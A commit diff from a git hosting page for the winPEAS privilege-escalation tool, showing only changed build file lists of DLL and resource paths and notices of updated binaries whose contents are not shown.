D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

BIN
winPEAS/winPEASexe/winPEAS/obj/Release/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/Release/winPEAS.pdb
View File

Binary file not shown.

9
winPEAS/winPEASexe/winPEAS/obj/x64/Release/winPEAS.csproj.FileListAbsolute.txt
View File

@ -18,7 +18,6 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x64\Release\winPEAS.pdb
@ -39,3 +38,11 @@ D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\win
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x64\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

BIN
winPEAS/winPEASexe/winPEAS/obj/x64/Release/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/x64/Release/winPEAS.pdb
View File

Binary file not shown.

9
winPEAS/winPEASexe/winPEAS/obj/x86/Release/winPEAS.csproj.FileListAbsolute.txt
View File

@ -18,7 +18,6 @@ D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\w
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\winPEAS.pdb
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\Microsoft.Win32.TaskScheduler.xml
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.csproj.Fody.CopyLocal.cache
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.csproj.CopyComplete
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.exe
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\obj\x86\Release\winPEAS.pdb
@ -39,3 +38,11 @@ D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\win
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\cambiado-privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\Microsoft.Win32.TaskScheduler.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\de\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\es\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\fr\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\it\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\pl\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\ru\Microsoft.Win32.TaskScheduler.resources.dll
D:\shared\privilege-escalation-awesome-scripts-suite-master\winPEAS\winPEASexe\winPEAS\bin\x86\Release\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll

BIN
winPEAS/winPEASexe/winPEAS/obj/x86/Release/winPEAS.csprojAssemblyReference.cache
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/x86/Release/winPEAS.exe
View File

Binary file not shown.

BIN
winPEAS/winPEASexe/winPEAS/obj/x86/Release/winPEAS.pdb
View File

Binary file not shown.